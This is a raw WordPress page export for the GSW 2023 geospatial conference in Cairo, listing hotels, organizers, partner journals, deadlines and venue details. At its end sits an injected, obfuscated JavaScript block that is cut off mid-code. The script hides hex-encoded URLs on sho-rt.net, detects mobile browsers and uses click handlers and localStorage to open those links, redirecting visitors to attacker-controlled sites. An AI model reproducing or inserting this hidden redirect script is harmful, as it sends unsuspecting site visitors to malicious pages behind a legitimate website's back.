#3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 